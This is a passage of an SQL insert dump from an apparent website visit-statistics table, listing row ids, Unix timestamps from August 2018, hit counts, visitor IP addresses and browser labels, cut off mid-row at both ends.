148.173','other'),(289326,1534474642,1,1,0,0,'54.36.148.166','other'),(289327,1534474692,8,8,0,0,'173.208.206.50','other'),(289328,1534474703,1,1,0,0,'54.36.148.64','other'),(289329,1534474715,1,1,0,0,'54.36.149.69','other'),(289330,1534475024,1,1,0,0,'54.36.148.151','other'),(289331,1534475366,1,1,0,0,'141.8.142.74','other'),(289332,1534475606,1,1,0,0,'54.36.148.139','other'),(289333,1534475659,1,0,1,0,'66.249.66.155',''),(289334,1534475842,1,1,0,0,'54.36.148.215','other'),(289335,1534476008,1,1,0,0,'54.36.148.20','other'),(289336,1534476183,1,1,0,0,'54.36.148.88','other'),(289337,1534476224,41,41,0,0,'54.92.182.0','other'),(289338,1534476226,1,1,0,0,'54.36.149.95','other'),(289339,1534476321,1,1,0,0,'54.36.148.15','other'),(289340,1534476351,1,1,0,0,'54.36.148.252','other'),(289341,1534476355,1,1,0,0,'54.36.149.51','other'),(289342,1534476395,1,0,1,0,'66.249.66.156',''),(289343,1534476438,1,1,0,0,'54.36.148.194','other'),(289344,1534476547,1,1,0,0,'54.36.148.250','other'),(289345,1534476783,1,1,0,0,'54.36.148.49','other'),(289346,1534477663,1,1,0,0,'54.36.148.102','other'),(289347,1534477669,2,2,0,0,'54.36.148.70','other'),(289348,1534477677,2,2,0,0,'141.8.142.74','other'),(289349,1534477681,1,1,0,0,'54.36.148.34','other'),(289350,1534477815,1,0,1,0,'66.249.66.156',''),(289351,1534477832,1,1,0,0,'95.163.255.172','other'),(289352,1534477863,1,1,0,0,'54.36.149.58','other'),(289353,1534477989,1,1,0,0,'95.163.255.173','other'),(289354,1534477991,1,1,0,0,'54.36.148.105','other'),(289355,1534478010,1,1,0,0,'54.36.148.169','other'),(289356,1534478021,1,1,0,0,'54.36.148.158','other'),(289357,1534478260,1,1,0,0,'54.36.148.217','other'),(289358,1534478301,1,1,0,0,'54.36.148.211','other'),(289359,1534478342,1,1,0,0,'54.36.148.156','other'),(289360,1534478396,1,1,0,0,'54.36.148.53','other'),(289361,1534478600,1,1,0,0,'216.244.66.241','other'),(289362,1534478711,1,1,0,0,'91.209.11.236','other'),(289363,1534478772,1,1,0,0,'54.36.148.71','other'),(289364,1534478839,1,1,0,0,'54.36.148.69','other'),(289365,1534478857,1,1,0,0,'54.36.148.125','other'),(289366,1534478899,1,1,0,0,'54.36.148.30','other'),(289367,1534478906,1,1,0,0,'54.36.149.34','other'),(289368,1534478919,1,1,0,0,'141.8.142.74','other'),(289369,1534479068,1,1,0,0,'66.249.66.155','chrome'),(289370,1534479152,1,1,0,0,'66.249.66.57','chrome'),(289371,1534479271,1,1,0,0,'54.36.148.137','other'),(289372,1534479606,1,1,0,0,'54.36.148.103','other'),(289373,1534479963,1,1,0,0,'95.163.255.169','other'),(289374,1534480083,1,1,0,0,'54.36.148.241','other'),(289375,1534480464,1,1,0,0,'54.36.149.75','other'),(289376,1534480523,1,1,0,0,'54.36.149.83','other'),(289377,1534480668,1,1,0,0,'37.9.113.182','other'),(289378,1534480793,1,1,0,0,'54.36.148.210','other'),(289379,1534480837,1,1,0,0,'54.36.148.124','other'),(289380,1534480859,1,1,0,0,'54.36.148.116','other'),(289381,1534480924,1,1,0,0,'54.36.149.48','other'),(289382,1534481081,1,1,0,0,'216.244.66.241','other'),(289383,1534481237,1,1,0,0,'54.36.148.132','other'),(289384,1534481240,1,1,0,0,'54.36.149.36','other'),(289385,1534481327,1,0,1,0,'66.249.66.157',''),(289386,1534481441,1,1,0,0,'54.36.149.55','other'),(289387,1534481475,1,1,0,0,'91.209.11.236','other'),(289388,1534481499,1,1,0,0,'54.36.148.219','other'),(289389,1534481601,1,1,0,0,'157.55.39.248','other'),(289390,1534481649,1,1,0,0,'141.8.142.74','other'),(289391,1534481682,1,1,0,0,'54.36.148.213','other'),(289392,1534481760,1,1,0,0,'91.196.177.46','chrome'),(289393,1534481809,1,1,0,0,'54.36.148.104','other'),(289394,1534481811,1,1,0,0,'54.36.148.171','other'),(289395,1534481889,1,1,0,0,'54.36.148.59','other'),(289396,1534481893,1,1,0,0,'54.36.149.71','other'),(289397,1534481948,1,1,0,0,'46.201.237.189','chrome'),(289398,1534482091,1,1,0,0,'8.29.198.25','other'),(289399,1534482395,1,1,0,0,'54.36.148.209','other'),(289400,1534482592,1,0,1,0,'66.249.66.156',''),(289401,1534482599,1,1,0,0,'54.36.148.210','other'),(289402,1534482723,1,1,0,0,'54.36.149.33','other'),(289403,1534483093,2,2,0,0,'141.8.142.74','other'),(289404,1534483191,1,1,0,0,'95.163.255.174','other'),(289405,1534483205,1,1,0,0,'37.9.113.182','other'),(289406,1534483217,1,1,0,0,'54.36.148.80','other'),(289407,1534483284,1,1,0,0,'95.163.255.151','other'),(289408,1534483407,1,1,0,0,'54.36.148.203','other'),(289409,1534483474,2,2,0,0,'178.154.171.88','other'),(289410,1534483620,1,1,0,0,'54.36.148.33','other'),(289411,1534483931,1,1,0,0,'54.36.148.200','other'),(289412,1534483957,1,1,0,0,'95.163.255.195','other'),(289413,1534484250,2,2,0,0,'54.36.149.92','other'),(289414,1534484301,1,1,0,0,'92.113.189.235','chrome'),(289415,1534484305,1,1,0,0,'54.36.148.251','other'),(289416,1534484344,1,1,0,0,'91.196.178.79','firefox'),(289417,1534484347,1,1,0,0,'87.250.224.46','other'),(289418,1534484456,1,1,0,0,'8.29.198.25','other'),(289419,1534484588,2,2,0,0,'216.244.66.241','other'),(289421,1534484754,1,1,0,0,'54.36.148.145','other'),(289422,1534484764,3,3,0,0,'91.196.178.172','chrome'),(289423,1534484874,1,1,0,0,'66.249.66.157','chrome'),(289424,1534484883,1,1,0,0,'66.249.66.59','chrome'),(289425,1534485157,1,1,0,0,'89.178.239.5','chrome'),(289426,1534485220,1,1,0,0,'213.130.12.47','chrome'),(289427,1534485276,1,1,0,0,'54.36.148.111','other'),(289428,1534485315,1,1,0,0,'54.36.149.94','other'),(289429,1534485338,1,1,0,0,'54.36.148.108','other'),(289430,1534485441,1,1,0,0,'54.36.148.218','other'),(289431,1534485889,1,1,0,0,'54.36.148.70','other'),(289432,1534485904,1,1,0,0,'54.36.149.29','other'),(289433,1534486010,1,1,0,0,'54.36.149.100','other'),(289434,1534486040,1,1,0,0,'54.36.149.78','other'),(289435,1534486344,1,1,0,0,'91.196.178.76','chrome'),(289436,1534486482,2,2,0,0,'216.244.66.241','other'),(289437,1534486709,1,1,0,0,'54.36.148.175','other'),(289438,1534486854,1,1,0,0,'54.36.148.156','other'),(289439,1534486944,1,1,0,0,'54.36.149.85','other'),(289440,1534487374,1,1,0,0,'54.36.148.229','other'),(289441,1534487659,1,1,0,0,'216.244.66.241','other'),(289442,1534487675,1,1,0,0,'77.37.231.149','msie'),(289443,1534487869,1,1,0,0,'54.36.148.175','other'),(289444,1534487913,1,1,0,0,'141.8.132.19','other'),(289445,1534487915,1,1,0,0,'95.163.255.194','other'),(289446,1534487955,1,1,0,0,'54.36.149.16','other'),(289447,1534488053,1,1,0,0,'54.36.148.68','other'),(289448,1534488114,1,1,0,0,'54.36.148.108','other'),(289449,1534488132,1,1,0,0,'40.77.167.143','other'),(289450,1534488192,1,1,0,0,'54.36.148.202','other'),(289451,1534488302,1,1,0,0,'91.196.178.68','chrome'),(289452,1534488376,1,1,0,0,'54.36.148.223','other'),(289453,1534488577,2,2,0,0,'216.244.66.241','other'),(289454,1534488627,1,1,0,0,'54.36.148.205','other'),(289455,1534488684,1,0,1,0,'66.249.66.155',''),(289456,1534488711,1,1,0,0,'54.36.148.134','other'),(289457,1534488742,1,1,0,0,'54.36.148.81','other'),(289458,1534489065,1,1,0,0,'54.36.148.156','other'),(289459,1534489435,1,1,0,0,'54.36.148.78','other'),(289460,1534489462,1,1,0,0,'95.163.255.184','other'),(289461,1534489920,1,1,0,0,'54.36.149.55','other'),(289462,1534489921,1,1,0,0,'54.36.149.27','other'),(289463,1534489956,1,1,0,0,'54.36.148.39','other'),(289464,1534490013,1,1,0,0,'54.36.148.193','other'),(289465,1534490028,1,1,0,0,'54.36.148.248','other'),(289466,1534490032,1,1,0,0,'54.36.148.148','other'),(289467,1534490077,1,1,0,0,'195.230.119.59','chrome'),(289468,1534490080,1,1,0,0,'54.36.149.52','other'),(289469,1534490141,1,1,0,0,'54.36.148.105','other'),(289470,1534490196,4,4,0,0,'51.254.205.212','other'),(289471,1534490272,1,1,0,0,'176.118.54.184','chrome'),(289472,1534490295,1,1,0,0,'82.145.209.44','other'),(289473,1534490363,1,1,0,0,'66.249.66.157','chrome'),(289474,1534490368,1,1,0,0,'66.249.66.57','chrome'),(289475,1534490929,1,0,1,0,'66.249.66.155',''),(289476,1534491037,1,1,0,0,'54.36.149.24','other'),(289477,1534491050,1,1,0,0,'54.36.148.241','other'),(289478,1534491324,1,1,0,0,'54.36.148.88','other'),(289479,1534491620,1,1,0,0,'95.163.255.115','other'),(289480,1534491662,1,1,0,0,'54.36.148.207','other'),(289481,1534491718,1,0,1,0,'66.249.66.156',''),(289482,1534491829,1,1,0,0,'54.36.148.189','other'),(289483,1534491945,1,1,0,0,'54.36.148.226','other'),(289484,1534492027,1,1,0,0,'54.36.149.63','other'),(289485,1534492115,2,2,0,0,'91.196.178.172','chrome'),(289486,1534492343,1,1,0,0,'54.36.149.52','other'),(289487,1534492424,1,1,0,0,'141.8.142.74','other'),(289488,1534492531,1,1,0,0,'162.210.196.98','other'),(289489,1534492570,1,1,0,0,'54.36.149.30','other'),(289490,1534492695,1,1,0,0,'54.36.149.39','other'),(289491,1534492860,1,1,0,0,'54.36.148.79','other'),(289492,1534492915,1,1,0,0,'8.29.198.27','other'),(289493,1534493031,1,1,0,0,'54.36.148.47','other'),(289494,1534493200,1,1,0,0,'5.39.34.40','firefox'),(289495,1534493296,1,1,0,0,'37.9.113.182','other'),(289496,1534493308,1,1,0,0,'54.36.148.189','other'),(289497,1534493862,1,1,0,0,'54.36.149.91','other'),(289498,1534493940,1,0,1,0,'66.249.66.155',''),(289499,1534494245,1,1,0,0,'54.36.148.128','other'),(289500,1534494246,1,1,0,0,'95.163.255.192','other'),(289501,1534494747,1,1,0,0,'54.36.149.50','other'),(289502,1534494752,1,1,0,0,'54.36.149.27','other'),(289503,1534494955,1,0,1,0,'66.249.66.155',''),(289504,1534495041,1,1,0,0,'54.36.148.157','other'),(289505,1534495203,1,1,0,0,'178.154.200.41','other'),(289506,1534495297,1,1,0,0,'8.29.198.26','other'),(289507,1534495298,1,1,0,0,'95.163.255.163','other'),(289508,1534495302,1,1,0,0,'54.36.149.85','other'),(289509,1534495511,1,1,0,0,'66.249.66.61','chrome'),(289510,1534495514,1,1,0,0,'157.55.39.92','other'),(289511,1534495618,1,1,0,0,'54.36.148.201','other'),(289512,1534495716,1,0,1,0,'66.249.66.156',''),(289513,1534495786,1,1,0,0,'54.36.148.112','other'),(289514,1534495903,1,1,0,0,'54.36.149.78','other'),(289515,1534495937,1,1,0,0,'40.77.167.143','other'),(289516,1534495978,3,3,0,0,'54.36.148.179','other'),(289517,1534496024,1,1,0,0,'54.36.148.238','other'),(289518,1534496037,1,1,0,0,'54.36.148.15','other'),(289519,1534496038,1,1,0,0,'178.95.66.69','chrome'),(289520,1534496091,1,1,0,0,'54.36.149.13','other'),(289521,1534496291,1,0,1,0,'66.249.66.155',''),(289522,1534496335,3,3,0,0,'91.196.178.172','chrome'),(289523,1534496482,1,1,0,0,'54.36.149.69','other'),(289524,1534496484,1,1,0,0,'216.244.66.241','other'),(289525,1534496545,1,1,0,0,'89.162.132.82','chrome'),(289526,1534496774,1,1,0,0,'54.36.149.27','other'),(289527,1534496796,1,1,0,0,'91.196.177.205','chrome'),(289528,1534496875,1,1,0,0,'54.36.148.171','other'),(289529,1534496931,1,1,0,0,'141.8.142.74','other'),(289530,1534497200,1,1,0,0,'54.36.148.53','other'),(289531,1534497254,1,1,0,0,'54.36.148.35','other'),(289532,1534497324,2,1,1,0,'66.249.66.156',''),(289533,1534497395,1,1,0,0,'91.196.177.11','other'),(289534,1534497445,1,1,0,0,'54.36.148.235','other'),(289535,1534497565,1,1,0,0,'54.36.148.176','other'),(289536,1534497598,1,1,0,0,'54.165.59.7','other'),(289537,1534497834,1,1,0,0,'95.132.59.5','chrome'),(289538,1534497924,1,1,0,0,'54.36.148.163','other'),(289539,1534498093,1,0,1,0,'66.249.66.157',''),(289540,1534498117,1,1,0,0,'54.36.148.250','other'),(289541,1534498169,1,1,0,0,'82.145.209.236','other'),(289542,1534498174,1,1,0,0,'82.145.209.58','other'),(289543,1534498507,1,1,0,0,'54.36.148.239','other'),(289544,1534498590,1,1,0,0,'91.196.178.79','firefox'),(289545,1534498670,1,1,0,0,'54.36.148.180','other'),(289546,1534498827,2,2,0,0,'195.10.210.70','chrome'),(289547,1534498854,1,1,0,0,'54.36.148.214','other'),(289548,1534499126,1,1,0,0,'54.36.148.67','other'),(289549,1534499132,1,0,1,0,'66.249.66.156',''),(289550,1534499199,1,1,0,0,'51.255.65.46','other'),(289551,1534499627,1,1,0,0,'54.36.148.253','other'),(289552,1534499792,1,1,0,0,'54.36.148.49','other'),(289553,1534500155,1,1,0,0,'54.36.149.81','other'),(289554,1534500177,2,2,0,0,'54.36.148.121','other'),(289555,1534500185,1,1,0,0,'54.36.149.54','other'),(289556,1534500281,1,1,0,0,'54.36.148.47','other'),(289557,1534500488,1,1,0,0,'54.36.148.251','other'),(289558,1534500511,1,1,0,0,'54.36.148.238','other'),(289559,1534500700,1,1,0,0,'54.36.149.62','other'),(289560,1534501233,2,2,0,0,'54.36.148.103','other'),(289561,1534501458,1,1,0,0,'54.36.148.114','other'),(289562,1534501581,1,1,0,0,'54.36.148.75','other'),(289563,1534501704,1,1,0,0,'157.55.39.157','other'),(289564,1534501971,1,1,0,0,'54.36.148.173','other'),(289565,1534502279,2,2,0,0,'54.36.148.212','other'),(289566,1534502347,1,1,0,0,'54.36.148.110','other'),(289567,1534502355,1,1,0,0,'178.154.171.88','other'),(289568,1534502469,1,1,0,0,'54.36.148.100','other'),(289569,1534502807,1,0,1,0,'66.249.66.61',''),(289570,1534502879,2,0,2,0,'66.249.66.156',''),(289571,1534502892,1,1,0,0,'54.36.148.145','other'),(289572,1534502918,1,1,0,0,'54.36.149.16','other'),(289573,1534502974,1,1,0,0,'54.36.149.8','other'),(289574,1534503042,1,1,0,0,'54.36.148.85','other'),(289575,1534503218,1,1,0,0,'54.36.149.64','other'),(289576,1534503346,1,0,1,0,'66.249.66.157',''),(289577,1534503524,1,1,0,0,'54.36.148.16','other'),(289578,1534503588,1,1,0,0,'178.93.2.160','chrome'),(289579,1534503648,1,1,0,0,'54.36.149.7','other'),(289580,1534503705,1,1,0,0,'54.36.148.205','other'),(289581,1534503745,1,1,0,0,'8.29.198.27','other'),(289582,1534503794,1,1,0,0,'54.36.148.192','other'),(289583,1534503933,1,1,0,0,'91.209.11.236','other'),(289584,1534503980,1,1,0,0,'54.36.148.241','other'),(289585,1534504105,1,1,0,0,'37.9.113.182','other'),(289586,1534504215,1,1,0,0,'54.36.148.45','other'),(289587,1534504436,1,1,0,0,'66.249.66.59','chrome'),(289588,1534504444,1,1,0,0,'54.36.148.110','other'),(289589,1534504488,2,1,1,0,'66.249.66.155',''),(289590,1534504550,1,1,0,0,'54.36.149.36','other'),(289591,1534504617,1,1,0,0,'54.36.148.118','other'),(289592,1534504618,1,0,1,0,'66.249.66.61',''),(289593,1534504752,1,1,0,0,'54.36.148.235','other'),(289594,1534504835,1,1,0,0,'157.55.39.97','other'),(289595,1534505060,1,1,0,0,'54.36.149.106','other'),(289596,1534505164,1,1,0,0,'54.36.148.162','other'),(289597,1534505267,1,1,0,0,'54.36.149.56','other'),(289598,1534505288,1,1,0,0,'54.36.148.65','other'),(289599,1534505304,1,1,0,0,'54.36.149.55','other'),(289600,1534505335,1,0,1,0,'66.249.66.157',''),(289601,1534505514,1,1,0,0,'78.111.190.117','chrome'),(289602,1534505793,1,1,0,0,'91.209.11.236','other'),(289603,1534505834,1,1,0,0,'54.36.148.12','other'),(289604,1534505864,1,0,1,0,'66.249.66.156',''),(289605,1534506018,1,1,0,0,'54.36.148.170','other'),(289606,1534506048,1,1,0,0,'54.36.148.66','other'),(289607,1534506103,1,1,0,0,'82.207.120.65','chrome'),(289608,1534506149,1,1,0,0,'8.29.198.25','other'),(289609,1534506544,1,1,0,0,'54.36.149.87','other'),(289610,1534506651,1,1,0,0,'91.196.178.172','chrome'),(289611,1534506711,1,1,0,0,'54.36.149.78','other'),(289612,1534506773,1,1,0,0,'95.163.255.184','other'),(289613,1534507049,1,1,0,0,'216.244.66.241','other'),(289614,1534507101,1,0,1,0,'66.249.66.155',''),(289615,1534507226,1,1,0,0,'54.36.149.86','other'),(289616,1534507284,1,1,0,0,'54.36.148.122','other'),(289617,1534507440,1,1,0,0,'87.250.224.46','other'),(289618,1534507600,1,1,0,0,'54.36.148.32','other'),(289619,1534507667,1,1,0,0,'54.36.148.241','other'),(289620,1534507749,1,1,0,0,'54.36.149.48','other'),(289621,1534507894,1,0,1,0,'66.249.66.57',''),(289622,1534508041,1,1,0,0,'178.154.171.88','other'),(289623,1534508249,1,1,0,0,'54.36.148.35','other'),(289624,1534508388,1,1,0,0,'54.36.148.12','other'),(289625,1534508477,1,1,0,0,'54.36.149.3','other'),(289626,1534508532,1,1,0,0,'54.36.148.58','other'),(289627,1534508799,2,0,2,0,'66.249.66.155',''),(289628,1534508936,1,1,0,0,'54.36.148.79','other'),(289629,1534509001,1,0,1,0,'66.249.66.156',''),(289630,1534509031,1,1,0,0,'54.36.148.222','other'),(289631,1534509258,1,1,0,0,'95.132.41.78','firefox'),(289632,1534509325,1,1,0,0,'216.244.66.241','other'),(289633,1534509583,1,1,0,0,'40.77.167.152','other'),(289634,1534509807,1,1,0,0,'54.36.149.98','other'),(289635,1534509971,3,3,0,0,'178.154.171.88','other'),(289636,1534510111,1,1,0,0,'5.164.84.206','msie'),(289637,1534510222,1,1,0,0,'54.36.148.156','other'),(289638,1534510358,1,1,0,0,'54.36.149.34','other'),(289639,1534510382,1,1,0,0,'54.36.148.245','other'),(289640,1534510519,1,1,0,0,'54.36.148.42','other'),(289641,1534510545,1,1,0,0,'87.250.224.46','other'),(289642,1534510661,1,1,0,0,'54.36.148.227','other'),(289643,1534510696,1,1,0,0,'54.36.148.158','other'),(289644,1534510816,1,1,0,0,'54.36.148.28','other'),(289645,1534510871,1,1,0,0,'54.36.148.57','other'),(289646,1534510971,1,1,0,0,'95.163.255.171','other'),(289647,1534510975,1,1,0,0,'54.36.148.32','other'),(289648,1534511072,1,1,0,0,'54.36.149.3','other'),(289649,1534511078,1,1,0,0,'40.77.167.57','other'),(289650,1534511119,1,0,1,0,'66.249.66.156',''),(289651,1534511120,1,1,0,0,'54.36.148.17','other'),(289652,1534511264,1,1,0,0,'54.36.149.24','other'),(289653,1534511350,1,1,0,0,'54.36.148.188','other'),(289654,1534511434,1,1,0,0,'66.249.66.61','chrome'),(289655,1534511439,1,1,0,0,'66.249.66.157','chrome'),(289656,1534511546,1,1,0,0,'54.36.148.73','other'),(289657,1534511744,2,2,0,0,'178.154.171.88','other'),(289658,1534511919,1,1,0,0,'54.36.149.106','other'),(289659,1534512075,1,1,0,0,'54.36.149.73','other'),(289660,1534512083,1,1,0,0,'95.163.255.184','other'),(289661,1534512164,1,1,0,0,'54.36.148.220','other'),(289662,1534512329,1,1,0,0,'54.36.149.40','other'),(289663,1534512382,1,1,0,0,'54.36.148.12','other'),(289664,1534512681,1,1,0,0,'54.36.148.172','other'),(289665,1534512805,1,1,0,0,'54.36.148.231','other'),(289666,1534512836,1,1,0,0,'37.9.113.182','other'),(289667,1534512914,1,1,0,0,'54.36.148.29','other'),(289668,1534512942,2,2,0,0,'54.36.148.221','other'),(289669,1534513291,1,1,0,0,'95.163.255.177','other'),(289670,1534513555,1,1,0,0,'54.36.148.168','other'),(289671,1534513687,1,0,1,0,'66.249.66.157',''),(289672,1534513988,1,1,0,0,'54.36.149.64','other'),(289673,1534514082,1,1,0,0,'54.36.148.52','other'),(289674,1534514299,1,1,0,0,'54.36.148.231','other'),(289675,1534514482,1,1,0,0,'54.36.148.244','other'),(289676,1534514509,1,1,0,0,'54.36.148.37','other'),(289677,1534514577,1,1,0,0,'8.29.198.25','other'),(289678,1534514660,1,1,0,0,'54.36.148.84','other'),(289679,1534514733,1,0,1,0,'66.249.66.157',''),(289680,1534515085,1,1,0,0,'54.36.148.246','other'),(289681,1534515144,1,1,0,0,'141.8.142.74','other'),(289682,1534515213,1,0,1,0,'66.249.66.61',''),(289683,1534515239,1,1,0,0,'95.163.255.112','other'),(289684,1534515281,1,1,0,0,'54.36.149.35','other'),(289685,1534515439,2,2,0,0,'216.244.66.241','other'),(289686,1534515647,1,1,0,0,'54.36.148.92','other'),(289687,1534515746,1,0,1,0,'66.249.66.155',''),(289688,1534515913,1,1,0,0,'54.36.148.103','other'),(289689,1534515939,1,0,1,0,'66.249.66.156',''),(289690,1534515986,1,1,0,0,'54.36.148.131','other'),(289691,1534516098,1,1,0,0,'54.36.149.21','other'),(289692,1534516303,1,1,0,0,'54.36.148.94','other'),(289693,1534516438,1,1,0,0,'54.36.148.205','other'),(289694,1534516497,1,1,0,0,'54.36.149.28','other'),(289695,1534516532,1,1,0,0,'54.36.149.72','other'),(289696,1534516583,1,1,0,0,'54.36.148.208','other'),(289697,1534516687,1,1,0,0,'178.154.171.88','other'),(289698,1534516784,1,1,0,0,'54.36.148.183','other'),(289699,1534516999,1,1,0,0,'8.29.198.25','other'),(289700,1534517045,1,1,0,0,'54.36.149.102','other'),(289701,1534517046,1,1,0,0,'37.9.113.182','other'),(289702,1534517171,1,1,0,0,'95.163.255.187','other'),(289703,1534517198,1,1,0,0,'95.163.255.189','other'),(289704,1534517431,1,1,0,0,'207.46.13.8','other'),(289705,1534517515,1,1,0,0,'54.36.148.23','other'),(289706,1534517894,1,1,0,0,'54.36.149.30','other'),(289707,1534518172,1,1,0,0,'54.36.148.52','other'),(289708,1534518269,1,1,0,0,'54.36.148.207','other'),(289709,1534518281,1,1,0,0,'54.36.148.47','other'),(289710,1534518313,1,1,0,0,'54.36.148.111','other'),(289711,1534518338,1,0,1,0,'66.249.66.157',''),(289712,1534518383,1,1,0,0,'54.36.148.90','other'),(289713,1534518418,1,1,0,0,'54.36.148.162','other'),(289714,1534518479,1,1,0,0,'141.8.142.74','other'),(289715,1534518500,1,1,0,0,'95.163.255.159','other'),(289716,1534518624,1,1,0,0,'54.36.148.133','other'),(289717,1534518712,1,1,0,0,'54.36.148.238','other'),(289718,1534518762,1,1,0,0,'54.36.149.56','other'),(289719,1534518919,1,1,0,0,'54.36.148.165','other'),(289720,1534518920,1,1,0,0,'54.36.149.42','other'),(289721,1534518953,1,1,0,0,'178.154.171.88','other'),(289722,1534519364,1,1,0,0,'54.36.148.192','other'),(289723,1534519630,1,1,0,0,'62.205.134.182','msie'),(289724,1534519886,1,1,0,0,'54.36.148.47','other'),(289725,1534520024,2,2,0,0,'216.244.66.241','other'),(289726,1534520165,1,1,0,0,'54.36.148.43','other'),(289727,1534520333,1,1,0,0,'54.36.149.21','other'),(289728,1534520342,1,1,0,0,'178.154.200.41','other'),(289729,1534520362,1,1,0,0,'54.36.148.99','other'),(289730,1534520389,1,1,0,0,'54.36.148.79','other'),(289731,1534520624,1,1,0,0,'54.36.148.251','other'),(289732,1534520738,1,1,0,0,'54.36.148.42','other'),(289733,1534520927,1,1,0,0,'54.36.148.86','other'),(289734,1534521082,1,1,0,0,'216.244.66.241','other'),(289735,1534521206,1,1,0,0,'54.36.148.202','other'),(289736,1534521291,1,1,0,0,'54.36.148.54','other'),(289737,1534521326,1,1,0,0,'54.36.148.15','other'),(289738,1534521333,12,12,0,0,'78.46.176.21','other'),(289739,1534521352,1,1,0,0,'54.36.148.65','other'),(289740,1534521620,2,2,0,0,'54.36.149.92','other'),(289741,1534521707,1,1,0,0,'92.113.189.235','chrome'),(289742,1534521710,1,1,0,0,'54.36.149.4','other'),(289743,1534521748,1,1,0,0,'54.36.148.235','other'),(289744,1534521872,1,1,0,0,'54.36.148.153','other'),(289745,1534521914,1,1,0,0,'54.36.148.155','other'),(289746,1534522085,1,1,0,0,'54.36.149.42','other'),(289747,1534522384,1,1,0,0,'54.36.148.121','other'),(289748,1534522406,1,1,0,0,'54.36.148.239','other'),(289749,1534522478,1,1,0,0,'54.36.149.96','other'),(289750,1534522849,1,1,0,0,'54.36.148.206','other'),(289751,1534523297,2,2,0,0,'95.163.255.92','other'),(289752,1534523467,1,1,0,0,'54.36.148.161','other'),(289753,1534523654,1,1,0,0,'54.36.148.121','other'),(289754,1534523685,1,1,0,0,'54.36.148.16','other'),(289755,1534523810,1,1,0,0,'54.36.149.14','other'),(289756,1534523922,2,1,1,0,'66.249.66.59',''),(289757,1534523927,1,1,0,0,'66.249.66.157','chrome'),(289758,1534523983,1,1,0,0,'54.36.149.67','other'),(289759,1534524488,1,1,0,0,'54.36.148.150','other'),(289760,1534524553,1,1,0,0,'54.36.149.53','other'),(289761,1534524627,1,1,0,0,'95.163.255.93','other'),(289762,1534524650,1,1,0,0,'54.36.148.250','other'),(289763,1534524789,1,1,0,0,'54.36.148.177','other'),(289764,1534524832,1,1,0,0,'54.36.148.222','other'),(289765,1534525362,1,1,0,0,'54.36.148.210','other'),(289766,1534525405,1,1,0,0,'8.29.198.26','other'),(289767,1534525536,1,1,0,0,'54.36.149.83','other'),(289768,1534525545,1,1,0,0,'54.36.148.176','other'),(289769,1534525579,2,0,2,0,'66.249.66.156',''),(289770,1534525726,1,1,0,0,'54.36.148.23','other'),(289771,1534525825,1,1,0,0,'54.36.149.81','other'),(289772,1534525947,2,2,0,0,'141.8.142.74','other'),(289773,1534526015,2,2,0,0,'54.36.149.71','other'),(289774,1534526039,1,0,1,0,'66.249.66.59',''),(289775,1534526228,1,1,0,0,'54.36.148.189','other'),(289776,1534526351,1,1,0,0,'54.36.149.73','other'),(289777,1534526377,1,1,0,0,'54.36.149.82','other'),(289778,1534526398,1,1,0,0,'54.36.148.169','other'),(289779,1534526952,1,1,0,0,'54.36.148.154','other'),(289780,1534526968,1,1,0,0,'54.36.148.245','other'),(289781,1534527004,1,1,0,0,'54.36.148.61','other'),(289782,1534527005,1,1,0,0,'54.36.148.104','other'),(289783,1534527083,1,1,0,0,'216.244.66.241','other'),(289784,1534527112,1,1,0,0,'52.53.201.78','chrome'),(289785,1534527240,1,1,0,0,'54.36.148.48','other'),(289786,1534527264,1,1,0,0,'54.36.148.80','other'),(289787,1534527341,1,1,0,0,'54.36.148.140','other'),(289788,1534527380,1,1,0,0,'54.36.149.69','other'),(289789,1534527386,1,1,0,0,'54.36.148.56','other'),(289790,1534527393,1,1,0,0,'54.36.149.82','other'),(289791,1534527411,1,1,0,0,'54.36.148.69','other'),(289792,1534527623,1,0,1,0,'66.249.66.157',''),(289793,1534527642,1,0,1,0,'66.249.66.155',''),(289794,1534527668,1,0,1,0,'66.249.66.59',''),(289795,1534527734,1,1,0,0,'54.36.149.83','other'),(289796,1534527852,1,1,0,0,'8.29.198.27','other'),(289797,1534527891,1,1,0,0,'54.165.59.7','other'),(289798,1534527894,1,0,1,0,'66.249.66.61',''),(289799,1534527960,1,1,0,0,'54.36.148.89','other'),(289800,1534528074,1,1,0,0,'54.36.148.70','other'),(289801,1534528171,2,2,0,0,'178.154.171.88','other'),(289802,1534528331,1,1,0,0,'54.36.148.103','other'),(289803,1534528360,1,1,0,0,'54.36.149.7','other'),(289804,1534528423,2,2,0,0,'141.8.142.74','other'),(289805,1534528758,1,1,0,0,'95.163.255.99','other'),(289806,1534528885,1,1,0,0,'91.196.177.11','other'),(289807,1534529039,1,0,1,0,'66.249.66.155',''),(289808,1534529101,2,2,0,0,'54.165.59.7','other'),(289809,1534529274,1,1,0,0,'54.36.148.228','other'),(289810,1534529292,1,1,0,0,'54.36.148.196','other'),(289811,1534529325,1,1,0,0,'54.36.149.10','other'),(289812,1534529497,1,1,0,0,'54.36.148.226','other'),(289813,1534529558,1,1,0,0,'66.249.66.59','chrome'),(289814,1534529562,2,1,1,0,'66.249.66.155',''),(289815,1534529737,1,1,0,0,'54.36.148.184','other'),(289816,1534529820,1,1,0,0,'54.36.149.80','other'),(289817,1534529961,1,1,0,0,'54.36.148.15','other'),(289818,1534530176,1,1,0,0,'54.36.148.202','other'),(289819,1534530236,1,1,0,0,'54.36.148.84','other'),(289820,1534530287,1,1,0,0,'157.55.39.250','other'),(289821,1534530394,1,1,0,0,'54.36.148.66','other'),(289822,1534530945,1,1,0,0,'54.36.148.53','other'),(289823,1534530999,1,1,0,0,'54.36.148.206','other'),(289824,1534531102,1,1,0,0,'95.163.255.99','other'),(289825,1534531110,1,1,0,0,'54.36.148.111','other'),(289826,1534531156,1,1,0,0,'54.36.148.141','other'),(289827,1534531216,1,1,0,0,'95.163.255.150','other'),(289828,1534531350,1,1,0,0,'54.36.148.99','other'),(289829,1534531499,1,1,0,0,'54.36.149.102','other'),(289830,1534531858,1,1,0,0,'54.36.148.209','other'),(289831,1534531908,1,1,0,0,'54.36.149.13','other'),(289832,1534532008,1,1,0,0,'54.36.148.149','other'),(289833,1534532057,1,1,0,0,'54.165.59.7','other'),(289834,1534532071,1,1,0,0,'141.8.142.74','other'),(289835,1534532230,1,1,0,0,'54.36.148.190','other'),(289836,1534532432,1,1,0,0,'54.36.148.162','other'),(289837,1534532438,1,1,0,0,'54.36.149.6','other'),(289838,1534532517,1,1,0,0,'54.36.148.86','other'),(289839,1534532641,1,1,0,0,'54.36.148.169','other'),(289840,1534532656,1,1,0,0,'54.36.148.59','other'),(289841,1534533002,1,1,0,0,'54.36.148.82','other'),(289842,1534533276,1,1,0,0,'54